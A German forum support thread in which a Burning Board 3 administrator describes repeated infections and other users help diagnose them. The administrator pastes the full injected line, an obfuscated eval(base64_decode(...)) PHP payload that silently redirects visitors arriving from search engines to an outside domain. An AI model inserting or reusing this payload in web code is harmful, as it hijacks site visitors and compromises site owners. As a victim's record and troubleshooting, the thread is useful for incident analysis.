Zum vierten mal .....Forum infiziert! (eval(base64_decode....)

  • Hallo zusammen,

    vorab möchte ich erwähnen, dass ich die Suche bemüht habe aber das passende Thema für mein Problem für Antworten geschlossen ist.

    Folgendes Problem: Ich habe die Burningboard Software nun zum 4 mal neu installiert, da das Forum jedesmal nach ein bis zwei Wochen nach der Instalation nicht mehr zu erreichen war. Es kam zwar keine Fehlermeldung, jedoch erscheint beim Aufruf des Forums nur ein weisser Bildschirm im Browser.

    Was ist passiert!?

    Da sich der Quelltext im Browser nicht auslesen läßt, habe ich meinen Editor bemüht und fand folgende Codezeile, welche in jeder .php auf einmal vorhanden war.

    Das rot makierte gehört da mit sicherheit nicht hin. Ziemlicher "Mist" hab ich mir gedacht..... da ich aber nicht wirklich lust hatte die Zeilen in jeder .php zu löschen, habe ich das Forum platt gemacht, den Ordner gelöscht, die Datenbank gelöscht, das ftp passwort erneuert, das root passwort erneuert und das Ganze System in einem neuen Ordner instaliert.

    Wie oben schon erwähnt, habe ich das Ganze bisher vier mal gemacht. Zuletzt, habe ich das Forum in einem Unterordner instaliert, eine statische Webseite vorgeschoben und das security - plug installiert. Hat aber alles nichts gebracht.

    Jetzt habe ich mich ein wenig durch das Forum / Google etc. gelesen und habe festgestellt, dass einige das Problem schon hatten. Meine Frage wie habt Ihr das Ganze gelöst.

    Wo könnte der Fehler liegen? Betroffen ist wohlbemerkt nur das WBB3 auf dem selben Server liegen noch Verzeichnisse / Shopsysteme / Blogsysteme etc. bei denen habe ich das Problem nicht.

    Zur Zeit überprüft der Provider unseren Server (Ergebnis ausstehend), die Passwörter sollten mit 48 Stellen (Klein / Großbuchstaben und Sonderzeichen) eigentlich sicher genug sein.

    Weis sonst noch wer einen Rat? Mein Problem ist, dass das Forum nächsten Monat an den Start gehen muß,

    Gruß

    Arno

  • Wenn du magst kannst du mir mal FTP-Zugangsdaten geben. Sowas hatte hier schonmal jemand, da war versteckt irgendwo auf dem Webspace noch ein WebFTP installiert, mit dem derjenige immer wieder seinen Scheiß nachladen konnte.

  • Hallo Dateninspektor,

    Am WBB selbst liegt es nicht. Höchstens an den falschen Dateirechten oder einer Sicherheitslücke im Server.


    danke für Deine Antwort. Die falschen Dateirechte? Ich habe nach der Installation nichts an den Dateirechten geändert. Wären bei einer Sicherheitslücke im Server nicht andere Systeme auch betroffen?
    Im selben Kundenordner liegen ca. 15 Sites. Darunter wie schon erwähnt, Webverzeichnisse, Shops, Blogsysteme und CMS Seiten. Ich frage mich wieso die nicht betroffen sind.

    Diesen Server betreibe ich jetzt seit 5 Jahren und habe noch nie ein Sicherheitsproblem gehabt. Ich möchte auch nicht behaupten, dass es am Forensystem liegt. Ich setze WBB schon seit mehreren Jahren für die Erstellung von Kundenforen ein. Bisher habe ich das Problem noch nicht gehabt. Ich muß nur dringenst die Ursache finden, damit ich zum einen mein Support - Forum ans laufen bekommen und zum andern weis ob die Kundenforen gefährdet sind.

    Gruß

    Arno

    Gruß

    Arno

  • Das rot makierte gehört da mit sicherheit nicht hin.


    Da ist leider nichts rot markiertes zu sehen. Würdest Du den Schadcode (zumindest den Anfang) bitte noch einmal posten? Irgendwie erinnert mich das an was.


    Gruß norse

    Zugang zu meinen Arbeiten und dem dazugehörigen Support bekommt Ihr bei Interesse hier und hier.

  • Oberster Hirte

    Da es sich um einen Kundenserver handelt, ist das nicht so einfach. Ich lade aber gerade die Logs und vergleiche den Mirror mit den aktuellen Daten um eine Auffälligkeit zu finden. Trotzdem Danke für Dein Angebot.


    norse

    sorry....... hat er im quote nicht dargestellt. hier nochmal nur die Schadzeile, welche direkt hinter (?php) steht.
    eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsKCWV4aXQoKTsKCX0KfQp9Cgl9"));


    Gruß

    Arno

  • Wenn du das eval() wegnimmst hast du einen kodierten String, der durch base_64_decode dekodiert wird. Den kannst du dann statt auszuführen dir einfach anzeigen lassen.
    Da kommt folgendes bei raus:

  • Mit dem Teil hatten wir es auch schon einmal zu tun. Interessant war, dass in zwei verschiedenen Webspace-Paketen auf dem selben Server jeweils die WBB-Installationen befallen waren. Zusätzlich hatte sich der Code allerdings noch in einigen php-Dateien des MySQLDumper eingenistet. Mit schöner Regelmäßigkeit trat das Phänomen in unterschiedlichen Abständen immer wieder auf, nachdem ich die befallenen Dateien gesäubert hatte. Der Hoster schwor Stein und Bein, es müsse eine Sicherheitslücke im WBB geben, doch eines Tages war der Spuk wie von Zauberhand vorbei.

    Mein persönliches Fazit: Es gab eine Sicherheitslücke in der Serverkonfiguration und der Hoster wollte es nicht zugeben. Mehr kann ich Dir leider nicht dazu sagen.


    Gruß norse

    Zugang zu meinen Arbeiten und dem dazugehörigen Support bekommt Ihr bei Interesse hier und hier.

  • Wie sind bei dir die Dateiberechtigungen eingestellt? Bei CGI benötigen die Dateien nur 644 und nicht wie überall beschrieben 777


    Wie schon gesagt habe ich an den Atributen nichts geändert. Aber einige der Dateien haben höhere Rechte.

    Ich weis zwar noch nicht, worüber der Hack geschehen ist, jedoch weis ich mittlerweile welche Dateien infiziert sind. Ich hab das Forum mal auf den Schadcode hin ausgelesen.

    Es ist jede PHP Datei betroffen...... jetzt muß ich erst einmal sehen, ob kein Kundensystem betroffen ist. ?(

    Gruß

    Arno

  • Für alle die zukünftig das gleiche Probem haben sollten, hänge ich hier mal das Script für die Suche nach dem Übeltäter an.

    grrrr.... das mit dem PHP im Quote ist echt gewöhnungsbedürftig.


    Ich hänge die Datei als Anhang an (aus der Endung txt bitte php machen). Einfach in den Startordner legen und https://www.woltlab.com/www.meine-domain.de/analyse.php aufrufen......

    Gruß

    Arno

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!